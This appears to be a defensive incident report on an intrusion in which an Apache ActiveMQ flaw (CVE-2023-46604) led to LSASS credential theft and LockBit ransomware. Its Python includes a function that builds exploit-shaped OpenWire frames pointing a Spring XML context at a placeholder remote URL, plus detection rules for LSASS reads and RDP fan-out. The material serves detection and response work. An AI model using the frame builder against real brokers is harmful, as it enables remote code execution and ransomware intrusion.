Full Report
Key Takeaways (from the source post "Apache ActiveMQ Exploit Leads to LockBit Ransomware", The DFIR Report): This intrusion began in mid-February 2024 after a threat actor exploited a vulnerability (CVE-2023-46604) on an exposed Apache ActiveMQ server. The threat actor was able to perform remote code execution (RCE) by using a Java Spring class and a custom Java Spring […]
Analysis Summary
# Incident Report: LockBit Ransomware via ActiveMQ Exploit
## Executive Summary
In mid-February 2024, a threat actor gained initial access by exploiting CVE-2023-46604 on an internet-facing Apache ActiveMQ server, leading to Remote Code Execution (RCE). Although initially evicted, the actor regained access 18 days later, performed extensive post-exploitation activities including credential access and lateral movement, and ultimately deployed LockBit ransomware derived from a leaked builder.
## Incident Details
- Discovery Date: Not stated in the summary.
- Incident Date: Began mid-February 2024.
- Affected Organization: Not disclosed (The DFIR Report, the publisher of the case, does not name victims).
- Sector: Not disclosed.
- Geography: Not disclosed.
## Timeline of Events
### Initial Access
- **Date/Time:** Mid-February 2024.
- **Vector:** Exploitation of vulnerability CVE-2023-46604 on an Apache ActiveMQ server.
- **Details:** The threat actor achieved Remote Code Execution (RCE) by abusing a Java Spring class together with a custom Java Spring component. CVE-2023-46604 is a deserialization flaw in ActiveMQ's OpenWire protocol handling: the broker instantiates an attacker-supplied class name from an ExceptionResponse command, which the actor used to load a Spring XML definition and so run arbitrary code. The actor was evicted but regained access to the same server 18 days later.
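As an added example (not code from The DFIR Report), the script below covers the two questions a responder asks first about this initial access: is a given broker version still exposed to CVE-2023-46604, and what does the exploit look like on the wire? `is_activemq_vulnerable()` compares a version string with the fixed releases from the Apache advisory (5.15.16, 5.16.7, 5.17.6, 5.18.3; 6.x is not listed as affected). `inspect_openwire_frame()` parses an OpenWire ExceptionResponse command and flags the exploit shape: a Throwable whose class is a Spring XML application context and whose message is a URL. The loose-encoding field order assumed here is the one the public proof-of-concept exploits use and is an assumption about the wire format, not something the report states; `build_exception_response()` exists only to construct sample frames, and the address in the sample is a documentation address.

```python
"""Added example (not code from The DFIR Report): two checks for CVE-2023-46604.

is_activemq_vulnerable(): version compared against the fixed releases in the
Apache advisory (5.15.16, 5.16.7, 5.17.6, 5.18.3; 6.x not listed as affected).

inspect_openwire_frame(): parses an OpenWire ExceptionResponse (type 31) and
flags a Spring XML application-context class name with a URL message, which
the vulnerable broker turns into new ClassPathXmlApplicationContext("<url>").
Assumed loose-encoding layout (as used by public PoCs): type(1), commandId(4),
responseRequired(1), correlationId(4), exception-not-null(1), then class and
message strings, each a not-null flag plus 2-byte big-endian length + UTF-8.
Trailing stack-trace bytes, if any, are ignored.
"""
import re
import struct
from typing import Optional

EXCEPTION_RESPONSE = 31
# first fixed patch level per 5.x branch; anything before 5.15.16 is affected
FIXED_PATCH_LEVELS = {15: 16, 16: 7, 17: 6, 18: 3}
SPRING_XML_CONTEXTS = {
    "org.springframework.context.support.ClassPathXmlApplicationContext",
    "org.springframework.context.support.FileSystemXmlApplicationContext",
}
URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def is_activemq_vulnerable(version: str) -> bool:
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)", version.strip())
    if not m:
        raise ValueError(f"unrecognised ActiveMQ version: {version!r}")
    major, minor, patch = (int(x) for x in m.groups())
    if major < 5 or (major == 5 and minor < 15):
        return True
    if major > 5:
        return False
    fixed = FIXED_PATCH_LEVELS.get(minor)
    return fixed is not None and patch < fixed


def _read_loose_string(buf: bytes, pos: int):
    """Loose OpenWire string: 1-byte not-null flag, 2-byte BE length, UTF-8 bytes."""
    if buf[pos] == 0:
        return None, pos + 1
    (n,) = struct.unpack_from(">H", buf, pos + 1)
    start = pos + 3
    return buf[start:start + n].decode("utf-8", errors="replace"), start + n


def parse_exception_response(frame: bytes):
    """Return (class_name, message) for an ExceptionResponse frame, else None."""
    if len(frame) < 5:
        return None
    (length,) = struct.unpack_from(">I", frame, 0)
    body = frame[4:4 + length]
    # type(1) + commandId(4) + responseRequired(1) + correlationId(4) + notNull(1)
    if len(body) < 11 or body[0] != EXCEPTION_RESPONSE or body[10] == 0:
        return None
    try:
        class_name, pos = _read_loose_string(body, 11)
        message, _ = _read_loose_string(body, pos)
    except (IndexError, struct.error):
        return None
    return class_name, message


def inspect_openwire_frame(frame: bytes) -> Optional[str]:
    """Return an alert string when the frame matches the exploit pattern."""
    parsed = parse_exception_response(frame)
    if parsed is None:
        return None
    class_name, message = parsed
    if class_name in SPRING_XML_CONTEXTS and message and URL_RE.match(message):
        return f"CVE-2023-46604 pattern: {class_name} loading {message}"
    return None


def build_exception_response(class_name: str, message: str) -> bytes:
    """Construct a loose-encoded ExceptionResponse frame (sample data only)."""
    def s(text: str) -> bytes:
        raw = text.encode("utf-8")
        return b"\x01" + struct.pack(">H", len(raw)) + raw
    body = (bytes([EXCEPTION_RESPONSE]) + struct.pack(">i", 0) + b"\x00"
            + struct.pack(">i", 0) + b"\x01" + s(class_name) + s(message))
    return struct.pack(">I", len(body)) + body


if __name__ == "__main__":
    print(is_activemq_vulnerable("5.18.2"), is_activemq_vulnerable("5.18.3"))
    # constructed sample frame; 198.51.100.0/24 is a documentation range
    sample = build_exception_response(
        "org.springframework.context.support.ClassPathXmlApplicationContext",
        "http://198.51.100.7/poc.xml")
    print(inspect_openwire_frame(sample))
```

The frame parser is deliberately tolerant: it only needs the class and message fields, so a sensor can apply it to the first bytes of any inbound OpenWire command without tracking connection state. The same signature generalises to any class name outside a broker allowlist, since the underlying flaw lets the sender choose the class.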
### Lateral Movement
- **Date/Time:** Following the second access (approx. 18 days after initial intrusion).
- **Vector:** Post-exploitation tools, specifically Metasploit/Meterpreter.
- **Details:** Attacker escalated privileges, accessed LSASS process memory, and moved laterally across the network.
### Data Exfiltration/Impact
- **Date/Time:** Following successful lateral movement.
- **Impact:** Deployment of LockBit ransomware, customized using a leaked builder. The actor leveraged extracted credentials to deploy the ransomware via RDP.
### Detection & Response
- **Detection:** How the intrusion was detected is not stated in the summary.
- **Response Actions:** The threat actor was evicted after the first intrusion, but the ActiveMQ server remained exploitable and the actor returned 18 days later. Containment and eradication steps after the ransomware deployment are not described in the summary.
## Attack Methodology
- **Initial Access:** Exploitation of CVE-2023-46604 on Apache ActiveMQ (RCE via Java Spring class/component).
- **Persistence:** No persistence mechanism is described; the actor's return 18 days later went through the same still-exploitable ActiveMQ server.
- **Privilege Escalation:** Achieved during post-exploitation using Metasploit/Meterpreter utilities.
- **Defense Evasion:** Not specifically described; Meterpreter's in-memory staging is the only relevant tooling noted.
- **Credential Access:** Accessing LSASS process memory was observed. Extracted credentials were used for RDP deployment of ransomware.
- **Discovery:** Not detailed; Metasploit was used for post-exploitation activity.
- **Lateral Movement:** Executed via network traversal tools, aided by compromised credentials.
- **Collection:** Not described in the summary.
- **Exfiltration:** Not mentioned in the summary.
- **Impact:** Full deployment of LockBit ransomware.
## Impact Assessment
- **Financial:** Not quantified; LockBit ransomware deployment typically entails significant recovery and operational costs.
- **Data Breach:** Credentials were harvested from LSASS memory; no theft of business data is described in the summary.
- **Operational:** Severe operational disruption due to LockBit ransomware deployment, necessitating recovery and system rebuilding.
- **Reputational:** Not detailed.
## Indicators of Compromise
*Note: The summary provides no hashes, IP addresses or domains. The items below are generic detection content for the tool classes the report names, not indicators confirmed for this intrusion.*
- **Network Indicators (Defanged):**
- Inbound OpenWire traffic to the ActiveMQ broker (default TCP/61616) from internet sources, in particular ExceptionResponse commands carrying a Spring `ClassPathXmlApplicationContext` class name and a remote URL.
- Network activity related to Remote Access Software (AnyDesk has been observed in related activity; not confirmed in this summary).
- DNS queries for known Remote Access Software domains from non-browser applications.
- **File Indicators:**
- Custom LockBit ransomware binary built from the leaked builder (modified ransom note and Session messaging contact details).
- **Behavioral Indicators:**
- `ET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software)` (generic RMM signature).
- `ET INFO EXE IsDebuggerPresent` (executable download containing debugger checks).
- `ETPRO POLICY Observed MS Certutil User-Agent in HTTP Request` (`certutil` used as a downloader).
- Metasploit/Meterpreter execution artifacts, the post-exploitation framework named in this report.
- Non-system processes opening a handle to `lsass.exe` with read access.
- One account establishing RDP sessions to many hosts in a short window (ransomware deployment).
- Silent installation and service creation of a Remote Access Software client.
## Response Actions
- **Containment:** The actor was evicted after the initial intrusion, but the exposed ActiveMQ server was not patched and the actor returned 18 days later. Containment after the ransomware deployment is not described in the summary; it would normally involve isolating affected systems from the network and blocking the exposed service.
- **Eradication:** Steps necessary to remove persistence mechanisms, the ransomware binary, and associated attacker tooling (Metasploit/Meterpreter).
- **Recovery:** Restoration of affected systems, likely involving wiping and rebuilding due to the ransomware encryption.
## Lessons Learned
- **Patch Management Criticality:** Immediate remediation of vulnerabilities like CVE-2023-46604 on internet-facing services is paramount, as failure to completely secure the service allowed for re-entry.
- **Persistence Remediation:** The initial eviction was insufficient; thorough host and network hygiene must be performed after eviction to ensure all persistence mechanisms are removed.
- **Ransomware Customization Awareness:** The use of a leaked LockBit builder suggests threat actors are evolving tools, evidenced by modified ransom notes and communication methods (Session messaging).
## Recommendations
- **Immediate Patching:** Prioritize patching of all known critical vulnerabilities, especially on public-facing services like Apache ActiveMQ.
- **Vulnerability Management:** Implement continuous monitoring and vulnerability scanning for internet-facing assets to detect potential exploit vectors quickly.
- **Credential Hygiene:** Monitor and restrict access to the LSASS process (for example with LSA protection and alerts on non-system handles to `lsass.exe`), and ensure strong, unique credentials across services so a single dump does not open the whole estate.
- **Detection Engineering:** Deploy specific detection rules for post-exploitation frameworks (like Metasploit/Meterpreter artifacts) and known ransomware deployment tactics (e.g., RDP credential usage for mass deployment).
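As an added example (not code from The DFIR Report), the script below implements two of the detections recommended above over constructed Windows telemetry. `detect_lsass_access()` flags a process outside a small allowlist opening `lsass.exe` with `PROCESS_VM_READ`, the credential-access step in this report, using Sysmon Event ID 10 fields. `detect_rdp_fanout()` flags one account logging on interactively over RDP (Security Event ID 4624, LogonType 10) to several hosts within a short window, the shape of ransomware pushed host by host with stolen credentials. The allowlist is a starting point to tune per environment, and every host name, path, account and address in the sample events is constructed.

```python
"""Added example (not code from The DFIR Report): two detections over constructed
Windows telemetry for behaviours named in this report.

detect_lsass_access(): Sysmon Event ID 10, a non-allowlisted SourceImage opening
lsass.exe with PROCESS_VM_READ in GrantedAccess.
detect_rdp_fanout(): Security Event ID 4624 LogonType 10, one account reaching
min_hosts distinct computers within a sliding time window.
Hosts, paths, accounts and addresses below are constructed sample data.
"""
from collections import defaultdict
from datetime import datetime, timedelta

PROCESS_VM_READ = 0x0010
LSASS_ALLOWLIST = {  # processes that legitimately read lsass; tune per environment
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}


def detect_lsass_access(events):
    """Return (Computer, SourceImage, GrantedAccess) for suspicious lsass.exe handles."""
    hits = []
    for e in events:
        if e.get("EventID") != 10:
            continue
        if not e["TargetImage"].lower().endswith("\\lsass.exe"):
            continue
        if e["SourceImage"].lower() in LSASS_ALLOWLIST:
            continue
        if int(e["GrantedAccess"], 16) & PROCESS_VM_READ:
            hits.append((e["Computer"], e["SourceImage"], e["GrantedAccess"]))
    return hits


def detect_rdp_fanout(events, window=timedelta(minutes=10), min_hosts=3):
    """Return (user, source_ip, hosts) when one account RDPs to >= min_hosts within window."""
    by_actor = defaultdict(list)
    for e in events:
        if e.get("EventID") == 4624 and str(e.get("LogonType")) == "10":
            key = (e["TargetUserName"].lower(), e["IpAddress"])
            by_actor[key].append((e["UtcTime"], e["Computer"]))
    alerts = []
    for (user, src), logons in by_actor.items():
        logons.sort()
        start = 0
        for end in range(len(logons)):  # sliding window over time-ordered logons
            while logons[end][0] - logons[start][0] > window:
                start += 1
            hosts = {host for _, host in logons[start:end + 1]}
            if len(hosts) >= min_hosts:
                alerts.append((user, src, sorted(hosts)))
                break
    return alerts


def _t(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


# Constructed sample telemetry (not from the incident).
SAMPLE_EVENTS = [
    {"EventID": 10, "Computer": "SRV-APP01", "SourceImage": r"C:\Windows\Temp\svc_update.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "Computer": "SRV-APP01",
     "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "Computer": "WKS-114", "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1000"},
]
for i, host in enumerate(["SRV-FS01", "SRV-DB01", "WKS-114", "SRV-APP02"]):
    SAMPLE_EVENTS.append({"EventID": 4624, "Computer": host, "LogonType": "10",
                          "TargetUserName": "DA-ADMIN", "IpAddress": "10.0.5.23",
                          "UtcTime": _t("2024-03-05 02:10:00") + timedelta(minutes=2 * i)})
SAMPLE_EVENTS.append({"EventID": 4624, "Computer": "WKS-221", "LogonType": "10",
                      "TargetUserName": "jdoe", "IpAddress": "10.0.7.41",
                      "UtcTime": _t("2024-03-05 02:12:00")})
SAMPLE_EVENTS.append({"EventID": 4624, "Computer": "SRV-FS01", "LogonType": "3",
                      "TargetUserName": "DA-ADMIN", "IpAddress": "10.0.5.23",
                      "UtcTime": _t("2024-03-05 02:13:00")})

if __name__ == "__main__":
    print(detect_lsass_access(SAMPLE_EVENTS))
    print(detect_rdp_fanout(SAMPLE_EVENTS))
```

The LSASS rule keys on the access mask rather than on a tool name, so it catches Meterpreter's built-in credential modules as readily as a renamed dumper; the RDP rule keys on the account and source address, which is what a single operator pushing a binary from one foothold looks like in 4624 data. Both thresholds are deliberately conservative and should be tuned against a baseline of legitimate administrative activity before being deployed as alerts.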